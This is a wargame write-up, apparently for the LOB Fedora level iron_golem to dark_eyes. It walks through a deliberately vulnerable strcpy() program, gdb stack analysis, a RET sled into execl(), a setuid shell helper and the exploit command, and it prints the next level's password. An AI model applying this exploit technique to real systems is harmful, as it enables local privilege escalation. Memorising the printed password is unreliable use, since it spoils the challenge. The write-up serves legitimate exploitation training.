[2] iron_golem -> dark_eyes ( RET Sleding )

2017. 11. 28. 13:21   SystemHacking/Fedora Catle





iron_golem / blood on the fedora


[ dark_eyes.c ]

/*
        - hint : RET sleding
*/
 
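/*
 * Intentionally vulnerable target (LOB Fedora "dark_eyes").
 *
 * argv[1] is copied into a 256-byte stack buffer with strcpy(), so an
 * over-long argument overwrites everything above the buffer: the 8 bytes
 * of padding, the saved ebp and the saved return address.  The program
 * snapshots the saved ebp *before* the copy and writes it back *after*
 * it, so the attacker keeps control of the return address (and of what
 * lies beyond it on the stack) but not of the frame pointer -- hence the
 * hint: a RET sled rather than a fake-frame (ebp) attack.
 *
 * Frame layout, from the disassembly: buffer at ebp-264, saved_sfp at
 * ebp-268, so buffer+264 == ebp == the saved-frame-pointer slot.  Reading
 * and writing buffer+264 is deliberately out of bounds of buffer[].
 *
 * NOTE(review): the listing on this page was transcribed as
 * memcpy(saved_sfp, buffer+2644) (two arguments, wrong offset).  The
 * binary actually performs memcpy(ebp-268, ebp-264+0x108, 4), i.e.
 * memcpy(saved_sfp, buffer+264, 4), which is what is written here.
 *
 * Returns 0; exits with status 0 if no argument was given.
 */
int main(int argc, char *argv[])
{
        char buffer[256];
        char saved_sfp[4];

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        /* save sfp: buffer+264 is this frame's saved-ebp slot */
        memcpy(saved_sfp, buffer+264, 4);

        /* overflow!! unbounded copy of attacker-controlled argv[1] */
        strcpy(buffer, argv[1]);

        /* restore sfp: undo any overwrite of the saved ebp, leaving only
         * the return address (and above) attacker-controlled */
        memcpy(buffer+264, saved_sfp, 4);

        printf("%s\n", buffer);
        return 0;
}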
 


[ gdb dark_eyes ]

(gdb) set disassembly-flavor intel

(gdb) disas main

Dump of assembler code for function main:

0x08048408 <main+0>:    push   ebp

0x08048409 <main+1>:    mov    ebp,esp

0x0804840b <main+3>:    sub    esp,0x118

... (생략) ...

0x08048447 <main+63>:   sub    esp,0x4

0x0804844a <main+66>:   push   0x4

0x0804844c <main+68>:   lea    eax,[ebp-264]

0x08048452 <main+74>:   add    eax,0x108

0x08048457 <main+79>:   push   eax

0x08048458 <main+80>:   lea    eax,[ebp-268]

0x0804845e <main+86>:   push   eax

0x0804845f <main+87>:   call   0x8048330 <_init+72>     ; memcpy( ebp-268, ebp-264+0x108 = ebp, 4 )  => saved_sfp = saved ebp

0x08048464 <main+92>:   add    esp,0x10

0x08048467 <main+95>:   sub    esp,0x8

0x0804846a <main+98>:   mov    eax,DWORD PTR [ebp+12]

0x0804846d <main+101>:  add    eax,0x4

0x08048470 <main+104>:  push   DWORD PTR [eax]

0x08048472 <main+106>:  lea    eax,[ebp-264]

0x08048478 <main+112>:  push   eax

0x08048479 <main+113>:  call   0x8048350 <_init+104>    ; strcpy( ebp-264, *( [ebp+12] + 4 ) )  => strcpy( buffer, argv[1] )

... (생략) ...

0x080484b8 <main+176>:  leave

0x080484b9 <main+177>:  ret

0x080484ba <main+178>:  nop

0x080484bb <main+179>:  nop



[ Stack 구조 ]

save_sfp      4byte        

buffer         256byte    

dummy       8byte       

saved ebp   고정 ( strcpy 이후 memcpy 로 원래 값이 복원되므로 덮어써도 무효 )

saved eip             



[ gdb 분석 ]

(gdb) b *0x080484b8

Breakpoint 1 at 0x80484b8

(gdb) run $(python -c 'print "A" * 268 ')

Breakpoint 1, 0x080484b8 in main ()

(gdb) x/24x $ebp-40

0xfeebb110:     0x41414141      0x41414141      0x41414141      0x41414141

0xfeebb120:     0x41414141      0x41414141      0x41414141      0x41414141

[ saved ebp ]

0xfeebb130:     0x41414141      0x41414141      0xfeebb198      0x00730e00

0xfeebb140:     0x00000002      0xfeebb1c4      0xfeebb1d0      0x0070eab6

0xfeebb150:     0x0083eff4      0x00000000      0xfeebb150      0xfeebb198

0xfeebb160:     0xfeebb140      0x00730df5      0x00000000      0x00000000


(gdb) run $(python -c 'print "A" * 272 ')

Breakpoint 1, 0x080484b8 in main ()

(gdb) x/24x $ebp-40

0xfeea5160:     0x41414141      0x41414141      0x41414141      0x41414141

0xfeea5170:     0x41414141      0x41414141      0x41414141      0x41414141

[ saved ebp ] [&ret]

0xfeea5180:     0x41414141      0x41414141      0xfeea51e8      0x41414141

[&ret] [&ret] [&execl] [xxxx]

0xfeea5190:     0x00000000      0xfeea5214      0xfeea5220      0x0070eab6

[cmd] [NULL]

0xfeea51a0:     0x0083eff4      0x00000000      0xfeea51a0      0xfeea51e8

0xfeea51b0:     0xfeea5190      0x00730df5      0x00000000      0x00000000


* int execl(const char *path, const char *arg, ...);

* execl( command , NULL ) 형태로 인자를 구성해주기 위해서, 0xfeea51a0 ( 값 0x0083eff4 ) 와 0xfeea51a4 ( 값 0x00000000 ) 가 각각 execl 의 첫 번째 / 두 번째 인자 위치에 오도록 &execl 의 위치 ( 0xfeea5198 ) 를 선정하였다


(gdb) x/4x 0x0083eff4

0x83eff4 <svcauthsw+712>:       0x0083ed3c      0x00730b96      0x00000000      0x00818df0


gdb를 통해서 메모리를 살펴보면 0xfeea51a0 주소 부분이 항상 일정한 값 ( 0x0083eff4, 그 뒤 4byte 는 0x00000000 ) 을 가지고 있음이 확인된다

해당 부분의 값을 인자 ( path = 0x0083eff4 , arg = NULL ) 로 사용하여 execl()함수를 실행시키도록 한다

인자로 사용하기 위해서는 해당 주소는 execl 진입 시점의 esp+4 , 즉 execl 프롤로그 이후의 ebp+8 위치에 있어야 한다 ( esp 가 가리키는 [xxxx] 슬롯은 execl 의 리턴 주소 자리가 된다 )


RET Sleding

ret    : pop eip , jmp eip => esp 가 가리키는 4byte 를 EIP 에 넣고 esp 를 4 증가시킨 뒤 그 주소로 분기한다. 따라서 &ret 를 연속으로 쌓아두면 ret 가 한 번 실행될 때마다 esp 가 4씩 올라가며 스택을 타고 내려간다 ( RET sled )


[ Stack 구조 ]

saved ebp    0xfeea51e8

saved eip     &ret

&ret

&ret

&execl


main 의 ret 가 첫 번째 &ret 를 꺼낸 뒤 ret 가 3번 더 수행되고, 마지막 ret 가 pop &execl , jmp &execl 을 하면서 execl() 함수가 실행되어진다. 이때 esp 는 [xxxx] 슬롯을 가리키므로 execl 은 esp+4 ( [cmd] ) 와 esp+8 ( [NULL] ) 을 자신의 인자로 읽는다


[ Shellcode 작성 ]

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
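/*
 * Payload helper for the dark_eyes exploit: raise the real uid to the
 * setuid-granted effective uid and spawn a shell.  It is reached through
 * execl() under the symlink name "\x3c\xed\x83" (see the ln -s step), so
 * it takes no arguments.
 *
 * Why setreuid() first: the session on this page shows real uid 501 and
 * effective uid 502 on entry, and uid=502 inside the shell afterwards;
 * the real uid is raised to the effective one before system() so the
 * child shell runs as the target user rather than dropping back to 501.
 *
 * Returns 0 on success, 1 if the uid could not be changed.
 */
int main(){
  uid_t euid = geteuid();

  printf("real_Id: %d\n", (int)getuid());
  printf("set uid: %d\n", (int)euid);

  /* setreuid(ruid, euid) takes two arguments.  The page's one-argument
   * call relied on an implicit declaration (no <unistd.h>) and passed
   * whatever happened to be on the stack as the second argument. */
  if (setreuid(euid, euid) != 0) {
    perror("setreuid");
    return 1;
  }

  system("/bin/sh");

  return 0;
}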
 


 $ vi shell.c

 $ gcc -o /home/iron_golem/shell shell.c



[ Payload 작성 ]

(gdb) p execl

$1 = {<text variable, no debug info>} 0x7a5720 <execl>

0x080484b9 <main+177>:  ret


0x0083eff4 주소에 들어있는 값 0x0083ed3c 는 메모리상 리틀엔디안 바이트 \x3c\xed\x83\x00 이므로, execl 의 path 인자로는 문자열 "\x3c\xed\x83" 이 전달된다. 이 이름으로 쉘 실행 파일에 심볼릭 링크를 걸어둔다 ( 상대 경로이므로 dark_eyes 를 실행하는 현재 디렉토리에 링크가 있어야 한다 )

$ ln -s /home/iron_golem/shell $(python -c 'print "\x3c\xed\x83"')


[iron_golem@Fedora_1stFloor ~]$ ./dark_eyes "$(python -c 'print "A" * 268 + "\xb9\x84\x04\x08" * 3 + "\x20\x57\x7a\x00"')"

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAh1▒▒▒▒▒ Wz

real_Id: 501

set uid: 502

sh-3.00$ whoami

dark_eyes

sh-3.00$ id

uid=502(dark_eyes) gid=501(iron_golem) groups=501(iron_golem) context=user_u:system_r:unconfined_t

sh-3.00$ my-pass

euid = 502

because of you